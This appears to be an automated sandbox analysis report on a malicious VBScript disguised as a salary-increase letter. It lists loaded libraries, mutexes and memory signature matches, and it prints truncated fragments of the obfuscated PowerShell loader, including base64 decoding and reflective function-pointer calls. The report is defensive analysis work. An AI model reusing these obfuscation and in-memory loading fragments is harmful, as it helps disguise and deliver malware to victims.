nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;Halvraadde			Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF7BFE4C022	8_2_00007FF7BFE4C022
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF7BFE4B276	8_2_00007FF7BFE4B276
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_029BF360	10_2_029BF360
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_029BFC30	10_2_029BFC30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_029BE0C7	10_2_029BE0C7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_029BF018	10_2_029BF018
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0708CDE0	10_2_0708CDE0

Java / VBScript file with very long strings (likely obfuscated code)

Source: Salary Increase Letter_Oct 2024.vbs

Initial sample: Strings found which are bigger than 50

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5132
Source: unknown	Process created: Commandline size = 5132
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5132	Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winVBS@6100/10@2/3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Foregrib.ses

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-KC5V8F

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5936
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6368

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: Yara match	File source: 0000000A.00000002.1653381480.0000000008BD7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1653204525.00000000083F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1635429037.0000000005943000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1441853777.000001B5E4687000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64string($Phonically)$gLOBAL:mlkEgRuPPErs59 = [systEM.text.ENCOdIng]::ascIi.gEtstRIng($konsiGnerEDes)$GLObAL:sinCIpiTa=$MLKEgrUpPeRs59.subsTRINg($mATegRIFfon,$TResseN)<#Micronesian Mrkegul Tra
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Minervan $despicable $Urocyst), (Unrecalling @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Fivepenny = [AppDomain]::CurrentDomain.GetAssemblies()$global:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Pinkies114)), $Kunstgdningsfabrikkers).DefineDynamicModule($stereophonically, $false).DefineType($Hackler, $tewer, [System.MulticastDe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64string($Phonically)$gLOBAL:mlkEgRuPPErs59 = [systEM.text.ENCOdIng]::ascIi.gEtstRIng($konsiGnerEDes)$GLObAL:sinCIpiTa=$MLKEgrUpPeRs59.subsTRINg($mATegRIFfon,$TResseN)<#Micronesian Mrkegul Tra

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF7BFE400BD pushad ; iretd	8_2_00007FF7BFE400C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF7BFE4A711 push eax; iretd	8_2_00007FF7BFE4A731
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF7BFE40942 push E95B7BD0h; ret	8_2_00007FF7BFE409C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF7BFF11229 push eax; retf	8_2_00007FF7BFF11249
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0708C020 pushfd ; ret	10_2_0708C3A5

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
